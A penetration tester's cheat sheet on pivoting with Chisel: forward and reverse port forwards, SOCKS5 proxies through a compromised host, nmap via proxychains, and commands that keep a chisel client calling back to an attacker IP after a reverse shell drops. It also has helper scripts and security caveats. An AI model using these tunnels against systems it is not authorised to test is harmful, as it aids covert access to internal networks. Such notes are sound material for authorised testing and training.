Port Forwarding with Chisel
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host
- Download from the Releases Page
Bash Function to Download Chisel Binaries
I've added this function to my ~/.zshrc file so that I can just invoke the function at any time to download the Linux and Windows chisel binaries.
function download_chisel() {
    # Use the "latest" slug to always grab the newest stable release
    latest_release_url='https://github.com/jpillora/chisel/releases/latest'
    # GitHub answers with a redirect; the Location header carries the URL of the
    # latest tagged release. Strip the trailing CR that HTTP header lines carry.
    latest_stable_url=$(curl -sI "$latest_release_url" | awk 'tolower($1) == "location:" {print $2}' | tr -d '\r')
    if [ -z "$latest_stable_url" ]; then
        echo "download_chisel: could not resolve the latest chisel release" >&2
        return 1
    fi
    # Release assets live under /releases/download/<tag>/ rather than /releases/tag/<tag>
    download_base_url=$(printf '%s' "$latest_stable_url" | sed 's#/tag/#/download/#')
    # Version number without the leading 'v', as used in the asset file names
    binary_version="${latest_stable_url##*/}"
    binary_version="${binary_version#v}"
    linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
    linux32_binary_name="chisel_${binary_version}_linux_386.gz"
    windows_binary_name="chisel_${binary_version}_windows_amd64.zip"
    windows32_binary_name="chisel_${binary_version}_windows_386.zip"
    linux_output_name='chisel.gz'
    linux32_output_name='chisel32.gz'
    windows_output_name='chisel.exe.zip'
    windows32_output_name='chisel32.exe.zip'
    # Download (-f so an HTTP error fails the function instead of saving an HTML page as "chisel.gz")
    curl -sfL "${download_base_url}/${linux_binary_name}" -o "$PWD/${linux_output_name}" || return 1
    curl -sfL "${download_base_url}/${linux32_binary_name}" -o "$PWD/${linux32_output_name}" || return 1
    curl -sfL "${download_base_url}/${windows_binary_name}" -o "$PWD/${windows_output_name}" || return 1
    curl -sfL "${download_base_url}/${windows32_binary_name}" -o "$PWD/${windows32_output_name}" || return 1
    # Extract (-f overwrites an existing ./chisel instead of prompting), tidy up, set mode on both Linux binaries
    gunzip -f "$linux_output_name"
    gunzip -f "$linux32_output_name"
    unzip -p "$windows_output_name" > chisel.exe
    unzip -p "$windows32_output_name" > chisel32.exe
    rm -f "$windows_output_name" "$windows32_output_name"
    chmod u+x ./chisel ./chisel32
    echo "Linux and Windows chisel binaries downloaded and unarchived in $PWD"
    echo "Compare them against the checksums published on the release page before dropping them on a target"
}
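The download function above trusts whatever GitHub hands back. The helper below is an added example of mine (not part of the original notes and not chisel's own code) for checking the fetched archives against a SHA-256 digest obtained out of band, e.g. from the checksums published with the release, before the binary goes anywhere near a target. It assumes GNU coreutils sha256sum or, on macOS, shasum; the "hex  filename" list format it reads is the common sha256sum output format, and the sample files in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example: verify downloaded release archives against known SHA-256 digests.
# Not from the original notes; assumes sha256sum (coreutils) or shasum (macOS).
set -u

# Print the lowercase hex SHA-256 of a file, using whichever tool is installed.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_sha256 FILE EXPECTED_HEX -> rc 0 on match, 1 on mismatch/missing file/bad digest.
verify_sha256() {
  local file="$1" expected actual
  expected="$(printf '%s' "$2" | tr 'A-F' 'a-f')"
  [[ -r "$file" ]] || { echo "FAIL: $file is missing or unreadable"; return 1; }
  [[ "$expected" =~ ^[0-9a-f]{64}$ ]] || { echo "FAIL: '$2' is not a SHA-256 hex digest"; return 1; }
  actual="$(sha256_of "$file")"
  if [[ "$actual" == "$expected" ]]; then
    echo "OK: $file"
    return 0
  fi
  echo "FAIL: $file"
  echo "  expected $expected"
  echo "  actual   $actual"
  return 1
}

# verify_checksums_file DIR LISTFILE: every "hex  name" line in LISTFILE must match DIR/name.
# A listed file that is absent counts as a failure, so a silently skipped download is caught.
verify_checksums_file() {
  local dir="$1" list="$2" rc=0 hex name
  while read -r hex name; do
    [[ -n "$hex" && -n "$name" ]] || continue   # skip blank/malformed lines
    name="${name#\*}"                           # tolerate "hex *name" (binary-mode) format
    verify_sha256 "$dir/$name" "$hex" || rc=1
  done < "$list"
  return $rc
}
```

Typical use after download_chisel: save the release's checksum list next to the archives and run verify_checksums_file "$PWD" checksums.txt before gunzip/unzip; a single FAIL line is reason enough to throw the download away.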
Latest release at the time of writing: v1.11.3
Example Commands
Chisel also supports authentication: --auth user:pass on the server (and the same --auth on the client) rejects clients that do not present the credentials, and --fingerprint on the client pins the server's key so you are not tunnelling through an impostor. Use both whenever the server listens on a reachable interface, and especially with --reverse, since an unauthenticated reverse server lets anyone who can reach it open listening ports on your box.
Individual Port Forwarding
NOTE: If you plan on running the chisel server on the target, ensure the traffic is allowed through any firewalls. In general, running the chisel server on the attack box is a safer bet
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | ===============>> | | |
| chisel client | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel server |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443
Chisel Server on Target
- Chisel server listens on TCP/51234 - make sure this port is open in the firewall
- --socks5 is only needed if a client will also request a socks remote; plain port forwards work without it
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
- Example shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
Example command
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.0.1:8443
Syntax explanation
.\chisel.exe client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.0.1:8443
                                        ^                             ^
                                        |                             |____attack-ip:attack-port:target-ip:target-port
                                        |
                                        |________attack-ip:attack-port:target-ip:target-port
Each remote is local-host:local-port:remote-host:remote-port. For a forward remote the local side is the chisel client (attack box), which opens the listener, and the remote side is what the chisel server (target) connects to. Giving 127.0.0.1 as the local host explicitly matters: if you omit it, chisel binds the listener to 0.0.0.0 and the target's internal service becomes reachable from every interface of the attack box.
Reverse Individual Port Forwarding
- A service on a compromised host is listening on 127.0.0.1
- Run the Chisel server on the attack box in reverse mode and connect to it from the target
- Specify one or many reverse port forwards on the client
- Each one opens a port on the attack box and forwards traffic to a remote port on the target
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | <<=============== | | |
| chisel server | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel client |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443
Chisel Server on Attack Box
- --reverse lets connecting clients request R: remotes, i.e. open listeners on this box; pair it with --auth user:pass, otherwise anyone who can reach TCP/51234 can do the same
./chisel server --reverse --port 51234
Chisel Client on Target
- Example command shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
Example command
/tmp/chisel client attack-box-ip:51234 R:127.0.0.1:8001:127.0.0.1:8001 R:127.0.0.1:8443:127.0.0.1:8443
Syntax explanation
.\chisel.exe client attack-box-ip:51234 R:127.0.0.1:8001:127.0.0.1:8001 R:127.0.0.1:8443:127.0.0.1:8443
                                        ^                               ^
                                        |                               |___ R:attack-ip:attack-port:target-ip:target-port
                                        |
                                        |___ R:attack-ip:attack-port:target-ip:target-port
# "R:" marks a reverse remote: the listener opens on the chisel server (attack box) and the chisel client (target) delivers each connection to target-ip:target-port
# "R:" is NOT shorthand for 127.0.0.1. If the attack-ip is omitted (R:8001:127.0.0.1:8001), chisel binds the listener to 0.0.0.0, so the target's internal service is exposed on every interface of the attack box
# Give 127.0.0.1 explicitly, as above, to keep the forwarded ports on the attack box's loopback
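Both the forward and the reverse syntax explanations above hinge on what chisel fills in for the fields you leave out. The parser below is an added example of mine, not the original notes' or chisel's own code: it decodes a remote string the way chisel's README documents the defaults as I read them (an omitted local-host means 0.0.0.0 on the listening side, an omitted local-port equals the remote-port, an omitted remote-host means 0.0.0.0 on the far side, and a bare socks remote defaults to port 1080; treat those defaults as assumptions and check them against the chisel version you run). It prints which side listens, on which interfaces, and where the other side connects, and it rejects malformed dotted-quad literals such as 127.0.01, which is exactly the kind of typo that is easy to make in these long remote strings.

```bash
#!/usr/bin/env bash
# Added example: explain what a chisel remote spec binds and reaches.
# Not from the original notes and not chisel's code; the defaults applied here
# are my reading of chisel's README (assumption):
#   local-host  omitted -> 0.0.0.0 (ALL interfaces of the listening side)
#   local-port  omitted -> same as remote-port
#   remote-host omitted -> 0.0.0.0 on the far side
#   "socks" alone       -> local port 1080
# Spec shapes: [R:][local-host:]local-port:remote-host:remote-port[/proto]
#              [R:][local-host:]local-port:socks
set -u

is_port() { [[ "$1" =~ ^[0-9]{1,5}$ ]] && (( 10#$1 >= 1 && 10#$1 <= 65535 )); }

# A host token made only of digits and dots must be a real dotted quad;
# hostnames are accepted as-is. Catches 127.0.01-style typos.
is_ok_host() {
  [[ "$1" =~ ^[0-9.]+$ ]] || return 0
  [[ "$1" =~ ^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$ ]] || return 1
  local o
  for o in "${BASH_REMATCH[@]:1}"; do (( 10#$o <= 255 )) || return 1; done
}

# explain_remote SPEC -> one descriptive line on stdout, or "error: ..." with rc 1
explain_remote() {
  local spec="$1" dir="forward" side="client" far="server" proto="tcp"
  if [[ "$spec" == R:* ]]; then dir="reverse"; side="server"; far="client"; spec="${spec#R:}"; fi
  if [[ "$spec" == */* ]]; then proto="${spec##*/}"; spec="${spec%/*}"; fi
  local -a p
  IFS=':' read -r -a p <<< "$spec"
  local n="${#p[@]}" lhost="0.0.0.0" lport="" rhost="0.0.0.0" rport=""
  if [[ "${p[n-1]}" == "socks" ]]; then
    case "$n" in
      1) lport=1080 ;;
      2) lport="${p[0]}" ;;
      3) lhost="${p[0]}"; lport="${p[1]}" ;;
      *) echo "error: too many fields in '$1'"; return 1 ;;
    esac
    rhost="socks"; rport="-"
  else
    # chisel parses from the back: remote-port, then remote-host if present,
    # then local-port, then local-host.
    local i=$((n - 1))
    rport="${p[i]}"; i=$((i - 1))
    if (( i >= 0 )) && ! is_port "${p[i]}"; then rhost="${p[i]}"; i=$((i - 1)); fi
    if (( i >= 0 )); then lport="${p[i]}"; i=$((i - 1)); fi
    if (( i >= 0 )); then lhost="${p[i]}"; i=$((i - 1)); fi
    (( i < 0 )) || { echo "error: too many fields in '$1'"; return 1; }
    is_port "$rport" || { echo "error: bad remote port '$rport' in '$1'"; return 1; }
    [[ -n "$lport" ]] || lport="$rport"
    is_ok_host "$rhost" || { echo "error: malformed address '$rhost' in '$1'"; return 1; }
  fi
  is_port "$lport" || { echo "error: bad local port '$lport' in '$1'"; return 1; }
  is_ok_host "$lhost" || { echo "error: malformed address '$lhost' in '$1'"; return 1; }
  local scope="bound to $lhost only"
  [[ "$lhost" == 127.* ]] && scope="loopback only"
  [[ "$lhost" == "0.0.0.0" ]] && scope="ALL interfaces"
  if [[ "$rhost" == "socks" ]]; then
    echo "$dir: $side listens on $lhost:$lport ($scope) as a SOCKS5 proxy, egress via $far"
  else
    echo "$dir: $side listens on $lhost:$lport ($scope) -> $far connects to $rhost:$rport/$proto"
  fi
}

# Usage: explain_remote R:8001:127.0.0.1:8001
#        explain_remote 127.0.0.1:8001:127.0.0.1:8001
#        explain_remote R:8443:127.0.01:8443   (rejected)
```

Run it over every remote before you paste a long client line into a reverse shell; the "ALL interfaces" tag is the one to look for when the thing behind the forward is a database or an admin panel.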
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box with --socks5
- Use the target box as a jump host to reach additional targets and networks routable from it
- Traffic flows forward from the attack box to the target box, where the chisel server acts as the SOCKS5 proxy, so every connection exits from the target's network position
SOCKS operates at layer 4 and up on the OSI model, and chisel's SOCKS5 proxy only carries TCP connections. Ping (ICMP) is a layer 3 protocol and UDP is not relayed either, so you cannot ping or UDP-scan targets through this proxy; use -Pn and connect scans instead.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | ===============>> | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel client | | |___________________________________| | chisel server | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080
Chisel Server on Target
- Chisel server is listening on TCP port 51234
- Make sure this port is open in the firewall
.\chisel.exe server --socks5 --port 51234
Chisel Client on Attack Box
Example command: Open TCP/50080 as the SOCKS5 proxy port on attack box
/tmp/chisel client target-box-ip:51234 127.0.0.1:50080:socks
Syntax explanation
/tmp/chisel client target-box-ip:51234 127.0.0.1:50080:socks
                                       ^
                                       |____attack-ip:attack-port:socks
A plain 50080:socks also works, but then chisel binds the proxy to 0.0.0.0 on the attack box and anyone who can reach it gets an unauthenticated SOCKS proxy into the target network; naming 127.0.0.1 keeps it on loopback
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and request a reverse socks remote
- Traffic enters the port on the attack box and flows in reverse over the tunnel to the target box, where the chisel client acts as the SOCKS5 proxy
As with the forward case, the proxy carries TCP only: ICMP (ping) and UDP do not traverse it.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | <<=============== | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel server | | |___________________________________| | chisel client | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080
Chisel Server on Attack Box
- --reverse is required for the client to request R: remotes; add --auth user:pass so nobody else can
/tmp/chisel server --reverse --port 51234
Chisel Client on Target
Example command: Open TCP/50080 as the SOCKS5 proxy port on attack box
.\chisel.exe client attack-box-ip:51234 R:127.0.0.1:50080:socks
Syntax explanation
.\chisel.exe client attack-box-ip:51234 R:127.0.0.1:50080:socks
                                        ^
                                        |___ R:attack-ip:attack-port:socks
"R:" marks a reverse remote: the SOCKS5 listener opens on the chisel server (attack box) and the chisel client on the target performs the outbound connections
"R:" is NOT shorthand for 127.0.0.1. A bare R:50080:socks makes chisel bind the proxy to 0.0.0.0 on the attack box, so anyone who can reach that port gets a SOCKS proxy into the target network; naming 127.0.0.1 keeps it on loopback
Proxychains
proxychains pushes tools that have no native proxy support (nmap, most thick clients) through the SOCKS5 port opened by a Forward or Reverse Dynamic SOCKS Proxy
sudo nano /etc/proxychains4.conf
The example below assumes you used tcp/50080 as the SOCKS5 proxy port (as shown in the example commands above). The [ProxyList] entry must say socks5, because that is the protocol chisel's built-in proxy speaks. Leave proxy_dns enabled (it is on by default) so hostnames are resolved through the proxy rather than by the attack box's own resolver.
[ProxyList]
socks5 127.0.0.1 50080
Port Scanning via SOCKS Proxy
proxychains works by hooking libc's connect() through LD_PRELOAD, so only full TCP connect scans (-sT) go through the proxy. Raw-socket scans (-sS and the other half-open/stealth scans, -sU, -O) and ICMP host discovery never touch the hook: they leave the attack box's own interface and either fail or scan the wrong network. Hence -Pn -sT every time.
Scanning 127.0.0.1 -- in this case -- causes the traffic to flow through the SOCKS session, come out the other side of the proxy on the target and effectively scan the loopback adapter on the target side.
# TCP connect scans through a proxy are brutally slow, so limit the port list. sudo is not needed: -sT, -sC and -sV use no raw sockets
proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1
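The two rules above (connect scans only, no ping) are easy to forget at 2 a.m. The wrapper below is an added example of mine, not part of the original notes or of proxychains/nmap: it refuses nmap options that would bypass a SOCKS proxy, writes a throw-away proxychains-ng config pointing at the chisel port instead of editing /etc/proxychains4.conf, checks that something is actually listening on that port (bash's /dev/tcp, no netcat needed), and then runs nmap with -Pn -sT forced on. It assumes proxychains4 is installed and that the SOCKS5 remote lives on 127.0.0.1:50080 as in the examples; the option list it rejects is my own selection of nmap's raw-socket features, not an exhaustive one.

```bash
#!/usr/bin/env bash
# Added example: run nmap through the chisel SOCKS5 port safely.
# Not from the original notes; assumes proxychains4 and a socks remote on 127.0.0.1:50080.
set -u

SOCKS_HOST=127.0.0.1
SOCKS_PORT=50080

# Return 1 (and say why) if an nmap argument needs raw sockets or ICMP,
# which proxychains cannot intercept: such probes leave the attack box directly.
check_scan_args() {
  local a
  for a in "$@"; do
    case "$a" in
      -sS|-sU|-sA|-sW|-sM|-sN|-sF|-sX|-sO|-sY|-sZ|-O|--traceroute|-PE|-PP|-PM|-PS*|-PA*|-PU*|-PY*|-PO*)
        echo "refusing '$a': raw-socket/ICMP option would bypass the SOCKS proxy"
        return 1 ;;
    esac
  done
  return 0
}

# proxychains-ng config on stdout: one socks5 hop, DNS resolved through the proxy,
# timeouts tightened so a dead tunnel fails fast instead of hanging the scan.
proxychains_conf() {
  printf 'strict_chain\nproxy_dns\nquiet_mode\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks5 %s %s\n' \
    "$SOCKS_HOST" "$SOCKS_PORT"
}

# True if the SOCKS port accepts a TCP connection (loopback, so a refusal is immediate).
socks_port_open() {
  ( exec 3<>"/dev/tcp/$SOCKS_HOST/$SOCKS_PORT" ) 2>/dev/null
}

# socks_nmap [nmap options] TARGET... : connect scan through the proxy, ping skipped.
socks_nmap() {
  check_scan_args "$@" || return 1
  socks_port_open || { echo "nothing listening on $SOCKS_HOST:$SOCKS_PORT; is the chisel tunnel up?"; return 1; }
  local conf rc
  conf="$(mktemp)"
  proxychains_conf > "$conf"
  proxychains4 -f "$conf" nmap -Pn -sT "$@"
  rc=$?
  rm -f "$conf"
  return $rc
}

# Usage: socks_nmap --top-ports 1000 -T4 -sC -sV 127.0.0.1
#        socks_nmap -sS 10.10.10.5      (refused)
```

Using -f with a private config also means a scan never depends on whoever last edited the system-wide proxychains4.conf, which matters on a shared attack box.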
Reverse Shell Tips
Run Chisel in the Background
Running chisel in the foreground of a reverse shell ties up the shell until chisel exits, so the shell is useless for anything else; the notes below are the workarounds.
Linux
Client Mode
nohup chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 > /dev/null 2>&1 &
Background the process with &. Redirecting stdout/stderr keeps chisel's log lines out of your shell, and nohup (or setsid) keeps the tunnel alive if the reverse shell is lost, which is usually what you want while you reconnect.
Server Mode
nohup chisel server --port 8080 --reverse > /dev/null 2>&1 &
Background the process with & as above. Remember that --reverse without --auth lets any client that reaches TCP/8080 open listeners on this host.
Windows
PowerShell
Client Mode
$scriptBlock = { C:\Windows\Temp\chisel.exe client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 }
Start-Job -ScriptBlock $scriptBlock
Store a PowerShell scriptblock in the $scriptBlock variable and run it in the background with Start-Job. Jobs belong to the PowerShell session that created them, so the tunnel dies with the session; if the tunnel must outlive the shell, launch chisel with Start-Process -WindowStyle Hidden instead.
Server Mode
Note that in server mode you will need to make sure the port is allowed through the Windows firewall, and that --socks5 without --auth gives anyone who can reach TCP/50001 a proxy into the host's network.
$scriptBlock = { C:\Windows\Temp\chisel.exe server --port 50001 --socks5 }
Start-Job -ScriptBlock $scriptBlock
Store a PowerShell scriptblock in the $scriptBlock variable and run it in the background with Start-Job; the same session-lifetime caveat as the client applies.